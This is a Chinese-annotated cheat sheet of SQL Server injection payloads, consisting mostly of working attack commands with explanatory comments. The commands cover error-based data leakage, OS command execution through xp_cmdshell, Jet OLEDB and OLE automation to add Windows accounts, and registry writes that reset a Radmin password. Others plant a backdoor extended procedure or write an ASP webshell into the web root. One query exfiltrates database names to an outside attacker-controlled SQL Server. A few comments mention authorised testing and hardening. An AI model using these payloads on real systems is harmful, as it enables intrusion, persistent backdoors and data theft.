-- 看看当前用户是什么权限：IS_MEMBER 检查当前用户是否属于某个数据库角色，返回 1/0，角色名无效时返回 NULL
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
-- 说明：%2B 是 URL 编码的 "+"；把 "|值|" 这样的字符串和整数 1 比较会触发类型转换错误，值随错误信息回显（报错注入，前提是应用把数据库错误原样返回）

-- 检测当前登录是否有访问某个数据库的权限：HAS_DBACCESS 返回 1/0，数据库不存在或名称无效时返回 NULL
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --


-- 数字类型参数（注入点直接拼进数字比较，不需要闭合引号）
and char(124)%2Buser%2Bchar(124)=0
-- 说明：user 是当前数据库用户名；"|user|" 转成 int 失败，用户名随转换错误回显

-- 字符类型参数（先用 ' 闭合原有字符串，末尾用 and ''=' 补齐被打断的引号）
' and char(124)%2Buser%2Bchar(124)=0 and ''='

-- 搜索类型参数（原语句是 LIKE '%...%'，末尾用 and '%'=' 补齐通配符和引号）
' and char(124)%2Buser%2Bchar(124)=0 and '%'='

-- 爆用户名：user（nvarchar）与整数 0 比较时 SQL Server 会尝试把用户名转成 int，转换失败的错误信息里带出用户名
and user>0
' and user>0 and ''='
-- 注意：同样依赖应用回显数据库错误；错误被屏蔽时此法无效

-- 检测当前登录是否为 sysadmin（即 sa 级权限）：IS_SRVROLEMEMBER 返回 1/0，角色名无效时返回 NULL
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
-- 下面用 0x 十六进制（UTF-16LE 编码的 'sysadmin'）代替字符串字面量，可绕过对单引号的过滤
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

-- 检测后端是不是 MSSQL：sysobjects 是 SQL Server 的系统表/兼容视图（Sybase 也有同名对象，必要时结合 @@version 等其他特征确认）
and exists (select * from sysobjects);--

-- 检测是否支持堆叠查询（一次执行多条语句）：能执行说明可以在注入点后追加任意语句
;declare @d int;--
-- 恢复被删除的 xp_cmdshell：重新注册扩展存储过程，要求 xplog70.dll 仍在 SQL Server 的 binn 目录下
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
-- 注意：这是 SQL Server 2000 的做法；2005 及以后 xp_cmdshell 默认是被禁用而不是被删除，需用 sp_configure 'xp_cmdshell',1 加 RECONFIGURE 开启

-- 用 OPENROWSET 让目标 SQL Server 主动连到另一台 SQL Server（出站连接）；2005 起需开启 Ad Hoc Distributed Queries，且凭据以明文出现在查询里
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

-- -----------------------
-- 执行命令
-- -----------------------
-- 首先改 Jet 沙盘模式：SandBoxMode=1 使 Jet 沙盒只对 Access 生效，SQL Server 这类非 Access 程序调用 Jet 时不受限制（原文称"开启沙盘模式"，实际是对外部程序放开）；写 HKLM 需要 sysadmin
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

-- 然后利用 Jet OLEDB 执行系统命令：Jet 引擎解析 SELECT 时调用 VBA 的 shell()，命令以 SQL Server 服务账户身份执行
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
-- 注意：依赖 32 位的 Jet 4.0 提供程序和 ias.mdb 存在（此处是 Windows 2000 的路径）；64 位实例没有 Jet 4.0

-- 通过 OLE 自动化执行命令：sp_OACreate 创建 WScript.Shell 对象，再用 sp_OAMethod 调 Run；2005 起需开启 Ole Automation Procedures
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
-- 说明：Run 不回显命令输出，只能靠结果（例如用户是否被创建）判断是否成功

-- 直接用 xp_cmdshell 执行命令（此处建一个目录做测试）；需要 sysadmin，或被授予执行权限并配置了 xp_cmdshell 代理账户
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'

-- 判断 xp_cmdshell 扩展存储过程是否存在（xtype='X' 即扩展存储过程；注意"存在"不等于"已启用"）：
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')

-- 写注册表（xp_regwrite，需要 sysadmin；以 SQL Server 服务账户身份写入）
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

-- 值类型除 REG_DWORD 外还可以是 REG_SZ（字符串）、REG_BINARY（二进制，见下文 radmin 的例子）

-- 读注册表（xp_regread；示例读取 Winlogon 下的 Userinit 值）
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

-- 读取目录内容（xp_dirtree：参数依次为路径、递归深度、是否同时列出文件；结果以结果集返回，不依赖命令执行）
exec master..xp_dirtree 'c:\winnt\system32\',1,1


-- 数据库备份：BACKUP DATABASE 会在服务器磁盘上落地文件，路径以 SQL Server 服务账户身份访问；需要该库的备份权限（db_owner/db_backupoperator 或 sysadmin）
backup database pubs to disk = 'c:\123.bak'

-- 爆出行数：把 COUNT 结果拼成 "|n|" 再与 0 比较，行数随类型转换错误回显（D99_Tmp 是临时表名，按实际表名替换）
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--


-- 更改 sa 口令：用 SQL 综合利用工具连接后执行（sp_password 第一个参数是旧口令，sysadmin 可传 NULL；此过程已弃用，新版本等价写法是 ALTER LOGIN sa WITH PASSWORD='新密码'）
exec sp_password NULL,'新密码','sa'
-- 注意：改 sa 口令会直接影响生产环境的正常使用，授权测试时务必事先取得同意并记录原状态

-- 添加一个 sysadmin 权限的登录 test（口令 9530772）；sp_addlogin/sp_addsrvrolemember 在新版本上已弃用，等价于 CREATE LOGIN 和 ALTER SERVER ROLE sysadmin ADD MEMBER
exec master.dbo.sp_addlogin test,9530772
exec master.dbo.sp_addsrvrolemember test,sysadmin
-- 删除该登录（标题说"添加和删除"，原文只给了添加）：exec master.dbo.sp_droplogin test
-- 删除扩展存储过程 xp_cmdshell 的语句（管理员加固时用）：
exec sp_dropextendedproc 'xp_cmdshell'
-- 添加扩展存储过程：把任意 DLL 注册为扩展存储过程，该 DLL 会在 SQL Server 进程内加载执行，等同于加载任意代码
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
-- 授予 public 执行权限后任何登录都能调用这个 DLL，是典型的后门留法；排查时应检查 sysobjects 中 xtype='X' 的非默认项
GRANT exec On xp_proxiedadata TO public

-- 停掉或启动某个 Windows 服务（xp_servicecontrol，需要 sysadmin，以 SQL Server 服务账户的权限操作服务控制管理器）

exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'

-- dbo.xp_subdirs：只列某个目录下的子目录（不列文件）

-- xp_getfiledetails：返回单个文件的属性（大小、时间戳等），可用来确认文件是否存在
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

-- dbo.xp_makecab：将多个文件压缩到一个 .cab 目标文件内。
-- 所有要压缩的文件都接在参数列最后，以逗号隔开。参数依次为：目标 cab 路径、压缩算法（mszip）、一个标志位（原文为 1，含义未见官方文档）、源文件列表。
-- 打包出的 cab 文件落在 SQL Server 主机上，仍需另想办法取回。

dbo.xp_makecab
'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

xp_terminate_process

-- 结束某个正在运行的进程，参数是 Process ID（PID）。
-- 本机上可在"任务管理器"中通过菜单「查看」-「选择列」勾选 PID 查看每个进程的 PID；远程注入场景下没有图形界面，PID 需另行获取。
-- 注意：杀错进程（例如 sqlservr.exe 自身或系统进程）会直接导致服务中断。

xp_terminate_process 2484
xp_unpackcab

-- 解开 .cab 压缩包到指定目录（参数：cab 路径、目标目录、标志位），与 xp_makecab 配合在目标主机上打包/解包文件。

xp_unpackcab 'c:\test.cab','c:\temp',1

案例：某机装了 Radmin，密码被改了，regedit.exe 不知是被删除还是被改名，net.exe 不存在，无法用 regedit /e 导入注册表文件，但 MSSQL 是 sa 权限。此时可直接用 xp_regwrite 写 Radmin 的注册表项：
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c
原文称写入上述 16 字节后密码即为 12345678（Radmin 2.x 把口令哈希存在 Parameter 值里；该哈希值此处未经验证，使用前自行核对）。如需修改端口：
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400
0xd20400 是小端序的 0x04d2 = 1234，即端口改为 1234。

-- 在自己控制的 SQL Server 上建一个接收库和两张表（ku 收库名，biao 收表内容），供下面的 OPENDATASOURCE 反向写入
create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);

-- 得到数据库名：让目标把 master..sysdatabases 里的库名插到攻击者的 SQL Server（211.39.145.163:1443）上；要求目标能出站连接该端口，且凭据 test/pafpaf 明文出现在查询里
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

-- 在 master 中创建表，测试当前权限（通常只有 master 的 db_owner 或 sysadmin 能做到）；测完记得 DROP 掉
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
-- 用 sp_makewebtask 直接在 web 目录里写入一句话木马：sp_makewebtask 把查询结果输出成 HTML 文件（SQL Server 2005 起已移除）
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
-- 说明：%20 是空格、%25 是 % 的 URL 编码；文件由 SQL Server 服务账户创建，要求该账户对 d:\www\tt 有写权限

-- 更新表内容（示例；带 WHERE 只改一行。注入中改动数据属于破坏性操作，授权测试应避免）
Update films SET kind = 'Dramatic' Where id = 123

-- 删除内容（示例；同样是破坏性操作，务必带 WHERE 条件，没有 WHERE 会清空整表）
delete from table_name where Stockid = 3